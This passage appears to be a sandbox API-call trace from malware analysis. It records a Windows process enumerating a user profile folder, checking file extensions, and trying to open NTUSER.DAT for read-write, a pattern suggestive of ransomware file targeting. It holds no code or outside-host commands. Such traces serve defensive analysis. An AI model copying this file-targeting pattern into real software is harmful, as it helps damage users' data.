(HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x300fe8 [0184.571] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a05b88 | out: hHeap=0x2c0000) returned 1 [0184.571] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40160 | out: hHeap=0x2c0000) returned 1 [0184.571] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a05b40 | out: hHeap=0x2c0000) returned 1 [0184.571] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a05c60 | out: hHeap=0x2c0000) returned 1 [0184.572] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a05a20 | out: hHeap=0x2c0000) returned 1 [0184.572] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a059d8 | out: hHeap=0x2c0000) returned 1 [0184.572] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29edc48 | out: hHeap=0x2c0000) returned 1 [0184.572] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2a059d8 [0184.572] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a05a68 | out: hHeap=0x2c0000) returned 1 [0184.573] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a05ab0 | out: hHeap=0x2c0000) returned 1 [0184.573] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x794a9330, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x7996bf30, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x7e7fbc40, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Favorites", cAlternateFileName="FAVORI~1")) returned 1 [0184.573] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2a05ab0 [0184.573] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2a05a68 [0184.573] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2a05a20 [0184.573] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a05a68 | out: hHeap=0x2c0000) returned 1 [0184.573] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a05ab0 | out: hHeap=0x2c0000) returned 1 [0184.573] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x794a9330, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0xf2ab6db0, ftLastAccessTime.dwHighDateTime=0x1d70911, ftLastWriteTime.dwLowDateTime=0xf2ab6db0, ftLastWriteTime.dwHighDateTime=0x1d70911, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Links", cAlternateFileName="")) returned 1 [0184.574] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2a05ab0 [0184.574] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2a05a68 [0184.574] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2a05c60 [0184.574] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a05a68 | out: hHeap=0x2c0000) returned 1 [0184.574] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a05ab0 | out: hHeap=0x2c0000) returned 1 [0184.574] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x79d965b0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x79d965b0, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x79d965b0, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Local Settings", cAlternateFileName="LOCALS~1")) returned 1 [0184.574] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a40160 [0184.574] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a40630 [0184.574] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x16c) returned 0x29dcde8 [0184.574] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2a05ab0 [0184.575] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a40210 [0184.575] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2a05a68 [0184.577] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2a05b40 [0184.577] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2a05b88 [0184.577] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2ae1eb8 [0184.577] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2ae1f00 [0184.577] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2ae1f48 [0184.577] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2ae1f90 [0184.577] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a05bd0 | out: hHeap=0x2c0000) returned 1 [0184.578] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40478 | out: hHeap=0x2c0000) returned 1 [0184.578] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a05af8 | out: hHeap=0x2c0000) returned 1 [0184.578] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a05c18 | out: hHeap=0x2c0000) returned 1 [0184.578] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x301078 | out: hHeap=0x2c0000) returned 1 [0184.579] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x300fe8 | out: hHeap=0x2c0000) returned 1 [0184.579] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a059d8 | out: hHeap=0x2c0000) returned 1 [0184.579] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a05a20 | out: hHeap=0x2c0000) returned 1 [0184.580] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a05c60 | out: hHeap=0x2c0000) returned 1 [0184.580] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5b18 | out: hHeap=0x2c0000) returned 1 [0184.580] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a40478 [0184.580] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40630 | out: hHeap=0x2c0000) returned 1 [0184.581] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40160 | out: hHeap=0x2c0000) returned 1 [0184.581] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x794a9330, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x9955cf30, ftLastAccessTime.dwHighDateTime=0x1d8a744, ftLastWriteTime.dwLowDateTime=0x9955cf30, ftLastWriteTime.dwHighDateTime=0x1d8a744, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Music", cAlternateFileName="")) returned 1 [0184.581] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2a05c60 [0184.581] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2a05a20 [0184.581] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2a059d8 [0184.581] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a05a20 | out: hHeap=0x2c0000) returned 1 [0184.581] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a05c60 | out: hHeap=0x2c0000) returned 1 [0184.582] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x79d4a2f0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x79d4a2f0, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x79d4a2f0, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="My Documents", cAlternateFileName="MYDOCU~1")) returned 1 [0184.582] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2a05c60 [0184.582] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x5e) returned 0x2a2ec70 [0184.582] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a05c60 | out: hHeap=0x2c0000) returned 1 [0184.582] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a40160 [0184.582] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a40630 [0184.582] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40160 | out: hHeap=0x2c0000) returned 1 [0184.583] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2ec70 | out: hHeap=0x2c0000) returned 1 [0184.583] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x79d70450, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x79d70450, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x79d70450, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="NetHood", cAlternateFileName="")) returned 1 [0184.583] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2a05c60 [0184.583] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2a05a20 [0184.583] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2a05c18 [0184.583] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a05a20 | out: hHeap=0x2c0000) returned 1 [0184.584] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a05c60 | out: hHeap=0x2c0000) returned 1 [0184.584] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x2026, ftCreationTime.dwLowDateTime=0x791af7b0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0xadfc6210, ftLastAccessTime.dwHighDateTime=0x1d8a8d3, ftLastWriteTime.dwLowDateTime=0xadfc6210, ftLastWriteTime.dwHighDateTime=0x1d8a8d3, nFileSizeHigh=0x0, nFileSizeLow=0x100000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="NTUSER.DAT", cAlternateFileName="")) returned 1 [0184.584] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a42698 [0184.584] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x46) returned 0x2a43280 [0184.584] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a42698 | out: hHeap=0x2c0000) returned 1 [0184.584] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\NTUSER.DAT") returned=".DAT" [0184.584] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\NTUSER.DAT" (normalized: "c:\\users\\keecfmwgj\\ntuser.dat"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0184.585] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a43280 | out: hHeap=0x2c0000) returned 1 [0184.585] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x79bf3690, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x79bf3690, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0xadf79f50, ftLastWriteTime.dwHighDateTime=0x1d8a8d3, nFileSizeHigh=0x0, nFileSizeLow=0x40000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ntuser.dat.LOG1", cAlternateFileName="NTUSER~1.LOG")) returned 1 [0184.585] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a42698 [0184.585] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a40160 [0184.585] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a42698 | out: hHeap=0x2c0000) returned 1 [0184.586] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\ntuser.dat.LOG1") returned=".LOG1" [0184.586] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40160 | out: hHeap=0x2c0000) returned 1 [0184.586] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x79bf3690, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x79bf3690, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x79bf3690, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ntuser.dat.LOG2", cAlternateFileName="NTUSER~2.LOG")) returned 1 [0184.586] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a42698 [0184.586] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a40160 [0184.586] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a42698 | out: hHeap=0x2c0000) returned 1 [0184.586] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\ntuser.dat.LOG2") returned=".LOG2" [0184.587] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40160 | out: hHeap=0x2c0000) returned 1 [0184.587] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x79bf3690, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x79bf3690, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x9151ca20, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x10000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf", cAlternateFileName="NTUSER~1.BLF")) returned 1 [0184.587] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a42698 [0184.587] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xa0) returned 0x33f3b0 [0184.587] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a42698 | out: hHeap=0x2c0000) returned 1 [0184.588] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned=".blf" [0184.588] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x33f3b0 | out: hHeap=0x2c0000) returned 1 [0184.588] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x79c197f0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x79c197f0, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x9151ca20, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x80000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms", cAlternateFileName="NTUSER~1.REG")) returned 1 [0184.588] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a42698 [0184.588] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xe0) returned 0x30a1f0 [0184.589] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a42698 | out: hHeap=0x2c0000) returned 1 [0184.589] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned=".regtrans-ms" [0184.589] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x30a1f0 | out: hHeap=0x2c0000) returned 1 [0184.589] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x79c3f950, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x79c3f950, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x9151ca20, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x80000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms", cAlternateFileName="NTUSER~2.REG")) returned 1 [0184.589] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a42698 [0184.589] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xe0) returned 0x30a1f0 [0184.590] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a42698 | out: hHeap=0x2c0000) returned 1 [0184.590] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned=".regtrans-ms" [0184.591] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x30a1f0 | out: hHeap=0x2c0000) returned 1 [0184.591] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x6, ftCreationTime.dwLowDateTime=0x7945d070, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x7945d070, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0xe9bbeade, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x14, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ntuser.ini", cAlternateFileName="")) returned 1 [0184.591] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a42698 [0184.591] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x46) returned 0x2a43280 [0184.591] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a42698 | out: hHeap=0x2c0000) returned 1 [0184.591] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\ntuser.ini") returned=".ini" [0184.592] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a43280 | out: hHeap=0x2c0000) returned 1 [0184.592] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xf29f86d0, ftCreationTime.dwHighDateTime=0x1d70911, ftLastAccessTime.dwLowDateTime=0xf2a44990, ftLastAccessTime.dwHighDateTime=0x1d70911, ftLastWriteTime.dwLowDateTime=0xf2a44990, ftLastWriteTime.dwHighDateTime=0x1d70911, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="OneDrive", cAlternateFileName="")) returned 1 [0184.592] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2a05c60 [0184.592] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2a05a20 [0184.592] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x214) returned 0x2a7d6f0 [0184.592] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2a05af8 [0184.592] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a40160 [0184.592] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2a05bd0 [0184.592] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2ae1fd8 [0184.592] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2ae2020 [0184.592] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2ae2068 [0184.593] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2ae20b0 [0184.593] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2ae20f8 [0184.593] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2ae2140 [0184.593] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a40528 [0184.593] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2ae2188 [0184.593] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a403c8 [0184.593] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2ae21d0 [0184.593] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a05ab0 | out: hHeap=0x2c0000) returned 1 [0184.594] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40210 | out: hHeap=0x2c0000) returned 1 [0184.594] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a05a68 | out: hHeap=0x2c0000) returned 1 [0184.595] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a05b40 | out: hHeap=0x2c0000) returned 1 [0184.595] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a05b88 | out: hHeap=0x2c0000) returned 1 [0184.595] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae1eb8 | out: hHeap=0x2c0000) returned 1 [0184.595] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae1f00 | out: hHeap=0x2c0000) returned 1 [0184.596] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae1f48 | out: hHeap=0x2c0000) returned 1 [0184.596] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae1f90 | out: hHeap=0x2c0000) returned 1 [0184.596] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40478 | out: hHeap=0x2c0000) returned 1 [0184.596] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a059d8 | out: hHeap=0x2c0000) returned 1 [0184.596] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40630 | out: hHeap=0x2c0000) returned 1 [0184.597] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a05c18 | out: hHeap=0x2c0000) returned 1 [0184.597] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29dcde8 | out: hHeap=0x2c0000) returned 1 [0184.597] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2a05c18 [0184.597] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a05a20 | out: hHeap=0x2c0000) returned 1 [0184.597] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a05c60 | out: hHeap=0x2c0000) returned 1 [0184.597] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x794a9330, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x995cf350, ftLastAccessTime.dwHighDateTime=0x1d8a744, ftLastWriteTime.dwLowDateTime=0x995cf350, ftLastWriteTime.dwHighDateTime=0x1d8a744, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Pictures", cAlternateFileName="")) returned 1 [0184.597] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2a05c60 [0184.597] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2a05a20 [0184.597] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2a059d8 [0184.598] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a05a20 | out: hHeap=0x2c0000) returned 1 [0184.598] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a05c60 | out: hHeap=0x2c0000) returned 1 [0184.598] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x79d70450, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x79d70450, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x79d70450, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="PrintHood", cAlternateFileName="PRINTH~1")) returned 1 [0184.598] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2a05c60 [0184.598] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x79d70450, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x79d70450, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x79d70450, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Recent", cAlternateFileName="")) returned 1 [0184.598] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x794a9330, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x798d39b0, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x7e8847c0, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Saved Games", cAlternateFileName="SAVEDG~1")) returned 1 [0184.598] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x794a9330, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x79992090, ftLastAccessTime.dwHighDateTime=0x1d70509, 